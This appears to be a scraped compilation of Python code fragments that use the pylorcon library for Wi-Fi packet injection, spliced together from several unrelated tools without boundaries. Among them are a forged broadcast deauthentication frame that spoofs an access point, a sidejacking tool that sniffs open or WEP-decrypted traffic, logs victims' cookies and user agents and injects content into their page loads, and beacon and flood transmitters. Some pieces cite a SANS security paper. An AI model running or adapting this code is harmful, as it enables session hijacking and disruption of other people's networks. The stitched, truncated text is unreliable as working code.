def __init__(self):
try:
self.lorcon = pylorcon.Lorcon(IFACE, DRIVER)
except pylorcon.LorconError as err:
print "Error creating lorcon object: "
print str(err)
exit()
self.lorcon.setfunctionalmode("INJMON")
self.lorcon.setchannel(CHANNEL)
# This needs an audit.
os.system("ifconfig " + pipes.quote(IFACE) + " up")
# Quick definitions for pcapy
MAX_LEN = 1514 # max size of packet to capture
PROMISCUOUS = 1 # promiscuous mode?
READ_TIMEOUT = 0 # in milliseconds
MAX_PKTS = 1 # number of packets to capture; 0 => no limit
try:
self.pcapy = open_live(IFACE, MAX_LEN, PROMISCUOUS, READ_TIMEOUT)
except PcapError as err:
print "Error creating pcapy descriptor, try turning on the target interface or setting it to monitor mode"
print str(err)
def main():
# WEP encrypted packet
packet = "\x08\x41\x0a\x00\x00\x03\x1b\xc2\x45\x33\x00\x1b\x4b\x29\x61\xb1"
packet += "\xff\x10\x07\x00\x12\x53\x00\x00\x00\x00\x00\x00\x00\x00\x3e"
packet += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet += "\x06\x00\x00\x00\x75\x41\x37\x5a\x4b\xbc\x55\x69\x07\x58\x4c"
packet += "\x03\xf4\xa7\x69\xbc\xdf\x46\x27\x4d\xd0\xb6\xcc\x7c\x8b\x8b"
packet += "\x46\x06\x30\x72\x67\x72\x5d\x49\xe6\x0a\xfb\x74\xef\x59\x1c"
packet += "\x24\x0b\x07\x60\xee\x1b\x87\xf1\x6f\x3a\x88\x54\x25\x5a\x90"
packet += "\xb4\x68"
try:
opts, args = getopt.getopt(sys.argv[1:], "hi:d:c:n:s:", [])
except getopt.GetoptError:
print usage()
return
iface = driver = numpkts = None
channel = sleep = 0
for o, a in opts:
if o == "-h":
print usage()
return
if o == "-i":
iface = a
if o == "-d":
driver = a
if o == "-c":
channel = int(a)
if o == "-n":
numpkts = int(a)
if o == "-s":
sleep = float(a)
if iface == None:
print "Must specify an interface name."
return
if driver == None:
print "Driver name not recognized."
return
tx = pylorcon.Lorcon(iface, driver)
tx.setfunctionalmode("INJECT")
tx.setchannel(channel)
try:
tx.setmodulation("DSSS")
except pylorcon.LorconError:
pass
try:
tx.settxrate(2)
except pylorcon.LorconError:
pass
if numpkts == None:
loopfunction = lambda x: True
else:
loopfunction = lambda x: x < numpkts
count = 0
try:
while loopfunction(count):
tx.txpacket("Hello World!")
count += 1
if sleep > 0:
time.sleep(sleep)
except KeyboardInterrupt:
pass
print "%s packets transmitted" % count
return
message.printMessage(driver+"\n")
sys.exit(-1)
if options.pysco == True:
#if false we wont use psyco
#usefull when using pdb
try:
import psyco
psyco.full()
except ImportError:
message.printMessage(" Psyco Not found you may wish to install it to increase speed")
try:
try:
import pylorcon
try:
tx = pylorcon.Lorcon(options.card,options.driver)
except pylorcon.LorconError,e:
message.printMessage(["\n",
e,"Interface "+options.card+" does not exist"])
sys.exit(-1)
except ImportError:
message.printMessage("\nPylorcon error, do you have it installed?")
sys.exit(-1)
try:
#populate the oui lookup datatbases
try:
try:
ouiLookup = libOuiParse.macOUI_lookup("./support/oui.txt")
except IOError:
ouiLookup = libOuiParse.macOUI_lookup("/usr/lib/airdrop-ng/oui.txt")
except IOError:
def __init__(self, iface, driver='mac80211'):
self.tx = pylorcon.Lorcon(iface, driver)
self.tx.setfunctionalmode('INJECT')
#
# For more information you can find the paper in the "Wireless Access" section of the
# SANS Reading Room at http://www.sans.org/reading_room/ or at www.digininja.org
#
########################################
import sys
from scapy import *
import pylorcon
interface = "ath0"
#interface = sys.argv[1]
eapol_packets = []
handshake_found = 0
injector = pylorcon.Lorcon("ath0", "madwifing")
injector.setfunctionalmode("INJECT")
injector.setmode("MONITOR")
injector.setchannel(11)
destination_addr = '\xff\xff\xff\xff\xff\xff' # i.e. broadcast
bss_id_addr = '\x00\x0e\xa6\xce\xe2\x28'
source_addr = bss_id_addr # The AP is sending the deauth
packet = "\xc0\x00\x3a\x01"
packet = packet + destination_addr
packet = packet + source_addr
packet = packet + bss_id_addr
packet = packet + "\x80\xcb\x07\x00"
def main():
try:
opts, args = getopt.gnu_getopt(sys.argv[1:], "hi:d:c:k:b:ur",
["ff3", "aggressive"])
except getopt.GetoptError:
usage()
return
get_referer = get_uagent = use_ff3 = bssid = wep_key = iface = driver = None
aggressive_inject = False
channel = -1
for o, a in opts:
if o == "-h" or o == "-?":
usage()
return
if o == "--ff3":
use_ff3 = True
if o == "--aggressive":
aggressive_inject = True
if o == "-u":
get_uagent = True
if o == "-r":
get_referer = True
if o == "-i":
iface = a
if o == "-d":
driver = a
if o == "-k":
wep_key = binascii.a2b_hex(a)
if o == "-b":
bssid = binascii.a2b_hex(a.replace(":", ""))
if o == "-c":
channel = int(a)
if FORCE_FF3: use_ff3 = True
if use_ff3 and not CAN_HAS_FF3:
print >> sys.stderr, "%s: Firefox 3 cookie support selected but pysqlite2 not installed\n" % sys.argv[
0]
return
if iface == None:
print >> sys.stderr, "%s: Must specify an interface name.\n" % sys.argv[
0]
usage()
return
if driver == None:
print >> sys.stderr, "%s: Driver name not recognized.\n" % sys.argv[0]
usage()
return
#if wep_key != None and bssid == None:
# print >>sys.stderr, "%s: Need BSSID for WEP decryption" % sys.argv[0]
# usage()
# return
tx = pylorcon.Lorcon(iface, driver)
tx.setfunctionalmode("INJECT")
if channel != -1: tx.setchannel(channel)
try:
tx.setmodulation("DSSS") # XXX?
except pylorcon.LorconError:
pass
try:
tx.settxrate(1) # XXX?
except pylorcon.LorconError:
pass
pc = pcap.pcap(iface)
#if not wep_key:
# Let teh kernel do the filtering before it hits slow userland+python
#pc.setfilter("udp src port 53 or tcp dst port 443 or tcp dst port 80 and host 10.212.96.152")
dns_table = DNSTable()
cookie_jars = CookieTracker(use_ff3)
tgt_table = TargetTable()
data_tracker = {}
recorded_agents = {}
decode = {
#pcap.DLT_LOOP:dpkt.loopback.Loopback,
#pcap.DLT_NULL:dpkt.loopback.Loopback,
#pcap.DLT_LINUX_SLL:dpkt.sll.SLL,
105: lambda (x): dpkt.ieee80211.IEEE80211(x),
119: lambda (x): dpkt.prism.Prism(x).data,
127: lambda (x): dpkt.rtap.Rtap(x).data
#, pcap.DLT_EN10MB:dpkt.ethernet.Ethernet
}[pc.datalink()]
try:
plog("NOTE",
'listening on %s (%d): %s' % (pc.name, pc.datalink(), pc.filter))
for ts, pkt in pc:
try:
#print "staring to parse"
try:
raw_pkt = decode(pkt)
except Exception, msg:
plog("WARN", "Parse failure: " + str(msg))
continue
dpk = raw_pkt.data
#print "got something"
if (not raw_pkt.is_data()) or raw_pkt.is_tkip_ccmp():
continue
if bssid:
if raw_pkt.mac2 != bssid and raw_pkt.mac0 != bssid and raw_pkt.mac1 != bssid:
#print "Pkt from other mac: "+raw_pkt.mac1
continue
is_wep = False
if raw_pkt.is_wep():
#print "Wep packet icv1: "+str(strn(raw_pkt.icv))
if wep_key: # Need to filter data ourselves
#iv = raw_pkt.iv
try:
raw_pkt.unwep(wep_key)
is_wep = True
except:
plog("WARN", "WEP Failure")
continue
dpk = raw_pkt.data
#raw_pkt.wep(iv, wep_key)
#print "Wep packet icv2: "+str(strn(raw_pkt.icv))
#continue
else:
continue
if raw_pkt.data.type != dpkt.llc.LLC_TYPE_IP:
#print "Odd pkt"
continue
if raw_pkt.data.data.p != dpkt.ip.IP_PROTO_UDP and \
raw_pkt.data.data.p != dpkt.ip.IP_PROTO_TCP:
#print "No TCP/UDP"
continue
if dpk.data.data.sport == 53: # DNS response
plog("DBUG", "DNS response")
dns_table.store(dpkt.dns.DNS(dpk.data.data.data))
elif dpk.data.data.dport == 443:
if dpk.data.data.flags & dpkt.tcp.TH_SYN \
and not dpk.data.data.flags & dpkt.tcp.TH_ACK:
ip = socket.inet_ntoa(dpk.data.src)
plog(
"INFO", "SSL connect to: " +
socket.inet_ntoa(dpk.data.dst))
host = dns_table.lookup(dpk.data.dst)
if host:
if host in IGNORE_HOSTS:
plog("INFO", "Skipping " + host)
continue
tgt_table.add_target(ip, host)
elif dpk.data.data.dport == 80:
if dpk.data.data.data:
try:
ip = socket.inet_ntoa(dpk.data.src)
# This may span multiple packets...
# Need a tracking table if NeedData is raised...
tup = ip + ":" + str(
dpk.data.data.sport) + "-" + socket.inet_ntoa(
dpk.data.dst) + ":" + str(
dpk.data.data.dport)
try:
if tup in data_tracker:
req = dpkt.http.Request(data_tracker[tup] +
dpk.data.data.data)
plog("INFO", "Clearing tuple: " + tup)
del data_tracker[tup]
else:
req = dpkt.http.Request(dpk.data.data.data)
except dpkt.NeedData, msg:
plog(
"INFO", "Tracking tuple " + tup +
" for more data: " + str(msg))
if not tup in data_tracker:
data_tracker[tup] = ""
data_tracker[tup] += dpk.data.data.data
if len(data_tracker[tup]) > MAX_TRACK_LEN:
plog(
"NOTE",
"Dropping excessive tracked data for: "
+ tup)
del data_tracker[tup]
continue
except dpkt.UnpackError, msg:
plog(
"NOTE", "HTTP error on tuple " + tup +
": " + str(msg))
if tup in data_tracker: del data_tracker[tup]
continue
# Passively record any cookies while we're at it
cookies = host = 0
if "host" in req.headers:
host = req.headers["host"]
if host: plog("DBUG", "Saw host: " + host)
else: continue
if "user-agent" in req.headers:
user_agent = req.headers["user-agent"]
else:
user_agent = ""
if host in IGNORE_HOSTS:
plog("INFO", "Skipping " + host)
if tgt_table.is_target_host(ip, host):
tgt_table.mark_pwnt(ip, host)
continue
if get_referer and "referer" in req.headers:
referer = req.headers["referer"]
#plog("INFO", "Referer: "+referer)
for r in LOG_REFERERS_WITH:
if r in referer:
plog(
"NOTE",
"ZOMG! Insecure referer: " +
referer)
log_referer(ip, referer)
if not tgt_table.is_target(ip):
tgt_table.add_target(ip)
if tgt_table.is_pwnable(ip) \
and not tgt_table.is_target_host(ip, host) \
and not tgt_table.is_pwnt(ip, host):
# Avoid xml, rss, img, etc
# Check accept string for text/html
if "accept" in req.headers and \
"text/html" in req.headers["accept"] or \
"MSIE" in user_agent:
plog(
"INFO",
"Valid accept on host " + host + ": " +
repr(req.headers["accept"]))
# Only inject if this is a fresh page load
if aggressive_inject or "referer" not in req.headers:
do_inject(tx, raw_pkt, ip, tgt_table,
is_wep, wep_key, "referer"
not in req.headers)
continue
else:
plog(
"DBUG", "Other accept: " +
repr(req.headers["accept"]))
# We should mark them at this point because for secure
# SSL sites we will get no cookies
tgt_table.mark_pwnt(ip, host)
if "cookie" in req.headers:
cookies = req.headers["cookie"]
if cookies and host:
cookie_list = cookies.split(";")
# XXX: Generalize this
if get_uagent and user_agent:
if ip not in recorded_agents or recorded_agents[
ip] != user_agent:
recorded_agents[ip] = user_agent
f = file("./cookies/uagent.log", "a+")
f.write(ip + ": " + user_agent + "\n")
f.close()
cookie_jars.write_cookies(
ip, host, cookie_list)
except dpkt.dpkt.UnpackError:
pass
#
# This file is part of Bunny.
#
# Bunny is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Bunny is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Bunny. If not, see <http://www.gnu.org/licenses/>.
import sys
import pylorcon
try:
lorcon = pylorcon.Lorcon("wlan4", "rt2800usb")
except pylorcon.LorconError:
print "Please run me as root"
lorcon.setfunctionalmode("INJECT")
lorcon.setmode("MONITOR")
lorcon.setchannel(11)
packet = "A" * 1400
for a in range(1, 200):
lorcon.txpacket(packet)
# # This code is part of the SANS/GIAC Gold Paper titled # # Programming Wireless Security # # by Robin Wood ([email protected]), accepted May 2008 # # For more information you can find the paper in the "Wireless Access" section of the # SANS Reading Room at http://www.sans.org/reading_room/ or at www.digininja.org # ######################################## import sys import pylorcon wifi = pylorcon.Lorcon("ath0", "madwifing") wifi.setfunctionalmode("INJECT") wifi.setmode("MONITOR") wifi.setchannel(1) #print "about to transmit"; essid = "HelloWorld" length_of_essid = chr(len(essid)) destination_addr = '\xff\xff\xff\xff\xff\xff' source_addr = '\xde\xad\xde\xad\xde\xad' bss_id_addr = '\x00\x1f\xb8\xff\xe2\x28' # Type/Subtype 0/8 Management/Beacon packet = '\x80\x00'